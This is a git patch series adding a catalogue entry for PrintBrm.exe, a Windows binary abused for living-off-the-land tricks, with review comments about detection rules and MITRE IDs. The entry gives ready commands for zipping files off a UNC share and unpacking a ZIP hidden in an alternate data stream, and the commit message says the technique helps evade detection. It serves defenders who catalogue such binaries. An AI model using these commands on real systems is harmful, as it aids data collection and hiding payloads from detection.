From 8f705bb7a4eb65867d6ca001d408f58059709704 Mon Sep 17 00:00:00 2001 From: Elliot Killick Date: Tue, 22 Jun 2021 02:11:27 +0000 Subject: [PATCH 1/3] Create PrintBrm.yml New lolbin for zipping & unzipping to and from UNC paths and ADS. The zip file could also serve as a useful form of obfuscation for evading detection. --- yml/OSBinaries/PrintBrm.yml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 yml/OSBinaries/PrintBrm.yml diff --git a/yml/OSBinaries/PrintBrm.yml b/yml/OSBinaries/PrintBrm.yml new file mode 100644 index 0000000..643f4b7 --- /dev/null +++ b/yml/OSBinaries/PrintBrm.yml @@ -0,0 +1,30 @@ +--- +Name: PrintBrm.exe +Description: Printer Migration Command-Line Tool +Author: Elliot Killick +Created: 21 Jun 2021 +Commands: + - Command: PrintBrm.exe -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip + Description: Create a ZIP file from a folder in a remote drive + Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/techniques/T1105/ + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: PrintBrm.exe -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder + Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder + Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder + Category: ADS + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/techniques/T1096/ + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +Full_Path: + - Path: C:\Windows\System32\spool\tools\PrintBrm.exe +Detection: + - IOC: PrintBrm.exe should not be run on a normal workstation +Acknowledgement: + - Person: Elliot Killick + Handle: @elliotkillick +--- 
From 63af8cca3b48729f800cc1f7baab759c6d9c3472 Mon Sep 17 00:00:00 2001 From: Elliot Killick Date: Sat, 10 Jul 2021 11:54:35 -0400 Subject: [PATCH 2/3] Add resources section and improve formatting --- yml/OSBinaries/PrintBrm.yml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/yml/OSBinaries/PrintBrm.yml b/yml/OSBinaries/PrintBrm.yml index 643f4b7..a190d87 100644 --- a/yml/OSBinaries/PrintBrm.yml +++ b/yml/OSBinaries/PrintBrm.yml @@ -1,8 +1,8 @@ --- Name: PrintBrm.exe Description: Printer Migration Command-Line Tool -Author: Elliot Killick -Created: 21 Jun 2021 +Author: 'Elliot Killick' +Created: '2021-06-21' Commands: - Command: PrintBrm.exe -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip Description: Create a ZIP file from a folder in a remote drive @@ -24,7 +24,9 @@ Full_Path: - Path: C:\Windows\System32\spool\tools\PrintBrm.exe Detection: - IOC: PrintBrm.exe should not be run on a normal workstation +Resources: + - Link: https://twitter.com/elliotkillick/status/1404117015447670800 Acknowledgement: - Person: Elliot Killick - Handle: @elliotkillick + Handle: '@elliotkillick' --- From 34af96f56445aaede8e340daf7f8d3e46daa5cd8 Mon Sep 17 00:00:00 2001 From: Elliot Killick Date: Thu, 26 Aug 2021 12:21:34 -0400 Subject: [PATCH 3/3] Remove .exe from command --- yml/OSBinaries/PrintBrm.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/PrintBrm.yml b/yml/OSBinaries/PrintBrm.yml index a190d87..3bbdb2f 100644 --- a/yml/OSBinaries/PrintBrm.yml +++ b/yml/OSBinaries/PrintBrm.yml 
@@ -4,7 +4,7 @@ Description: Printer Migration Command-Line Tool Author: 'Elliot Killick' Created: '2021-06-21' Commands: - - Command: PrintBrm.exe -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip + - Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip Description: Create a ZIP file from a folder in a remote drive Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file Category: Download @@ -12,7 +12,7 @@ Commands: MitreID: T1105 MitreLink: https://attack.mitre.org/techniques/T1105/ OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: PrintBrm.exe -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder + - Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder Category: ADS
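Review bot: In PATCH 1/3, the `+Detection:` entry (`+  - IOC: PrintBrm.exe should not be run on a normal workstation`) is too coarse to be actionable and will false-positive on print servers and admin jump boxes where PrintBrm is the supported migration tool; suggest keying the IOC on the command-line shapes this entry documents, i.e. a `-d`/`-f` argument that starts with `\\` (UNC path) or a `-f` argument whose file name carries a `:stream` suffix (alternate data stream), with the image path `C:\Windows\System32\spool\tools\PrintBrm.exe` as the process filter. Two metadata points in the same hunk: `MitreID: T1096` is a revoked ATT&CK ID (NTFS File Attributes now lives under T1564.004, Hide Artifacts: NTFS File Attributes), so the ID and link should be updated; and the first command's `Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file` contradicts its `Category: Download` and `MitreID: T1105` (Ingress Tool Transfer), since the command pulls remote content onto the local disk rather than sending it out, so either re-word the usecase as a download/collection step or change the category and technique to match.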
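Review bot: In PATCH 2/3, the second hunk's new `+Resources:` block cites only a tweet (`+  - Link: https://twitter.com/elliotkillick/status/1404117015447670800`), which is a fragile reference for a catalogue entry; suggest adding Microsoft's own documentation for the Printer Migration command-line tool as a second link so the switches (`-b`, `-r`, `-d`, `-f`) remain verifiable if the social-media post disappears. The quoting added in the first hunk (`+Author: 'Elliot Killick'`, `+Created: '2021-06-21'`, `+  Handle: '@elliotkillick'`) is a good change: it makes the date an ISO string and stops `@` from being read as a YAML reserved indicator.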
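Review bot: In PATCH 3/3, dropping the `.exe` suffix from both `Command:` lines (`+  - Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip`) is consistent with how other entries in the repository are written, but the commit message should note that `Full_Path` and the `Detection` IOC intentionally keep `PrintBrm.exe`, since those refer to the on-disk image name rather than the typed command; a detection author reading the entry should match on the image name, not on the shortened command token.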